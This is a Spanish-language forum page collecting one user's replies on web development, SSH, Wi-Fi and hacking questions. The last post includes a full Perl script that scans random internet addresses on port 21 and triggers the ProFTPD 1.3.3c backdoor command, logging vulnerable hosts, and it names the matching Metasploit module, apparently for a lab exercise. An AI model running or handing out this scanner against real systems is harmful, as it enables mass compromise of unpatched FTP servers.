Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - adastra

#351
el problema que tienes es este?
http://en.wikipedia.org/wiki/Same_origin_policy
#352
Si he comprendido bien, lo que necesitas es abrir dichas ventanas desde el "onload" de la etiqueta <body>

Por otro lado, para que solamente le salte a los primeros "N" usuarios, desde javascript llevar un contador para que salte dicha ventana solamente un numero determinado de veces, pero dado que lo tienes que almacenar en el servidor también (la cuenta de la cantidad de usuarios que han visualizado la ventana), la mejor solución en dicho caso es utilizar ajax.
#353
fundador de la FSF (Free Software Foundation) y creador de la GNU Licence
ni creador de Linux ni creador de c.  :xD :xD
#354
Hacking Wireless / Re: Contraseñas wiifi
4 Mayo 2012, 00:54 AM
WAP no existe, seguramente te refieres a WPA y cualquier clave que sea implementada con WEP, en la actualidad es posible crackear.
#355
En realidad no es tan complicado...
Por ejemplo, esto se puede hacer con primefaces:
http://www.primefaces.org/showcase-labs/ui/fileUploadSingle.jsf
Si os fijáis en el código HTML que ha generado primefaces para dicho componente, ha necesitado una etiqueta <span> y un estilo. En concreto en estas lineas:

<span class="ui-button-text">Choose</span><input type="file" id="j_idt15:j_idt16_input" name="j_idt15:j_idt16_input" />

Y como podéis ver, tiene un estilo completamente personalizado, lo mismo se puede extrapolar a escribir manual la página HTML+CSS. (Sin necesidad de implementar javascript).
#356
Lo he utilizado anteriormente y funciona prácticamente igual que el ssh-agent de openssh, solamente es útil cuando estas trabajando con claves del tipo publica/privada.
No se trata de un cliente, es solamente un "repositorio" local de claves privadas que permite realizar la conexión con un servicio SSH remoto sin necesidad de andar tecleando siempre la passphrase de la clave privada.
Por otro lado, el hecho de que uses SSH no te hace "inmune", es perfectamente posible ejecutar un ataque MITM en una red wifi desconocida y comprometer la conexión entre el cliente y el servidor SSH.
#357
Sencillo.
Crea una hoja de estilos CSS que contenga la imagen y la defines en el botón.
Lee un poco sobre CSS en internet para que entiendas lo que te estoy diciendo (en el caso de que lo hayas comprendido ya)
Un Saludo.
#358
Hacking / Re: Ayuda :D
3 Mayo 2012, 23:57 PM
Busca vulnerabilidades en los servicios que abren dichos puertos.
#359
Se trata de datos binarios que en una base de datos se representa con campos del tipo CLOB (Character Large Object) y BLOB (Binary Large Object) el primero sirve para almacenar campos de texto realmente grandes y el segundo (que es el que te interesa) te sirve para almacenar documentos y cualquier tipo de recurso en formato serializado (array de bytes) como por ejemplo, imagenes.
que base de datos usas? ya que no todas soportan ese tipo de datos.
#360
el servicio  proftpd que esta instalado no es vulnerable.
Podéis probarlo con el script "bitchscan.pl" o directamente desde el modulo de metasploit "exploit/unix/ftp/proftpd_133c_backdoor"


Para los que querais probar el script, pongo el código
en la linea
$ip = "x.x.x.x";
poner la dirección que os han enviado por correo, el script encuentra que el servicio tiene la versión que es vulnerable, pero después de ejecutar, no es posible establecer el backdoor, indicando que el servicio no es "hackeable".


#!/usr/bin/perl
use IO::Socket;
## IP GENERATOR ##
print "\n! ProScan - Started !\n";

sub ipgen(){
my $range1 = 223;        #avoid experimental and multicast
my $range2 = 240;               
$oct1 = int(rand($range1)) + 1;        #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();        #if local or private call again
}else{
#$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
$ip = "x.x.x.x";
}
return $ip;        #return to caller       
}
##
## MAIN ##
while(1==1){        # keeps code running indefinatly
$target = &ipgen();        # get random ip to scan
print "SCANNING: $target \n";        # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '21',     
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 3 to be safe
                 );
if($sock){        # if socket opened (port open)

sysread($sock,$buf,1024);        # readheader - may need to make the buffer size 4096 instead of 1024
print "FTP SUCCESS: $target \n";                # print to screen
if ($buf =~ m/ProFTPD 1.3.3c/){
  print "\n!!Proftpd 1.3.3c Found!!\n";
  print $sock "HELP ACIDBITCHEZ\n";
  sysread($sock,$buf,1024);
  if ($buf =~ m/502/){
print "\n NOT HACKABLE \n";
  }else{
    print $buf;
  print "\n\n HACKABLE BOX FOUND \n\n";
          open (MYFILE, '>>proftpd_1.3.3c-exploitable.txt');
          print MYFILE "Proftp Found: $target :$buf\n";
  close(MYFILE);
}

}
}
close($sock);        # close the socket
}##